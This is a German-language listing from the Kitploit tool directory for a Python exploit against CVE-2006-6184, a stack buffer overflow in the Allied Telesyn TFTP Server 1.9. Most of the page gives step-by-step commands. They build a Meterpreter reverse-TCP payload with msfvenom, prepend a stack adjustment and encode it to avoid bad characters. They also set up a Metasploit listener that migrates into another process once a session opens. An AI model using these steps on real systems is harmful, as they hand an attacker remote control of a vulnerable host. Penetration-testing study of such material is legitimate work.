Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2006-6184 — Dies ist ein Python-basierter eigenständiger Exploit für CVE-2006-6184. Dieser Exploit löst einen stack-basierten Pufferüberlauf im Allied Telesyn TFTP Server (AT-TFTP) 1.9 und möglicherweise früheren Versionen aus, der es entfernten Angreifern ermöglicht, einen Denial-of-Service zu verursachen oder beliebigen Code auszuführen. | Kitploit
Tools/GitHubGitHub/shauntdergrigorian/cve-2006-6184
Payload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsRemote-Access-ToolBinary-Exploitation
GitHubshauntdergrigorian/cve-2006-6184

cve-2006-6184

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
1171vor 5 JahrenNoch nicht geprüft

Über

Dies ist ein Python-basierter eigenständiger Exploit für CVE-2006-6184. Dieser Exploit löst einen stack-basierten Pufferüberlauf im Allied Telesyn TFTP Server (AT-TFTP) 1.9 und möglicherweise früheren Versionen aus, der es entfernten Angreifern ermöglicht, einen Denial-of-Service zu verursachen oder beliebigen Code auszuführen.

Teilen

CVE-2006-6184

Dies ist ein eigenständiger Exploit auf Python-Basis für CVE-2006-6184. Dieser Exploit löst einen stack-basierten Pufferüberlauf im Allied Telesyn TFTP Server (AT-TFTP) 1.9 und möglicherweise früheren Versionen aus, der es entfernten Angreifern ermöglicht, einen Denial-of-Service zu verursachen oder beliebigen Code auszuführen.

Anweisungen (aktualisiert für 2020)

Das Payload muss angepasst werden, um Ihre eigene IP-Adresse und Ihren Listening-Port zu enthalten. Sie müssen es also manuell generieren. Gehen Sie dazu wie folgt vor:

1.) Geben Sie Folgendes ein, um eine Hex-Datei mit dem Betrag zu erstellen, der vom Stack-Pointer subtrahiert werden muss (3500):

root@kitploit:~
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Verwenden Sie als Nächstes den folgenden Befehl, um ein gestuftes Meterpreter-Shell-Payload zu erstellen:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[Ihre IP] LPORT=[Ihr Port] R > payload

3.) Kombinieren Sie dann die beiden soeben erstellten Dateien.

root@kitploit:~
cat stackadj payload > shellcode

4.) Entfernen wir schließlich die schlechten Zeichen.

root@kitploit:~
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python

Geben Sie die Ausgabe als Wert der Variablen "payload" ein. Möglicherweise müssen Sie diesen Exploit einige Male ausführen, damit er funktioniert.

Metasploit-Listener

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
  3. set ExitOnSession false
  4. set AutoRunScript post/windows/manage/migrate
  5. exploit -j
Tool herunterladen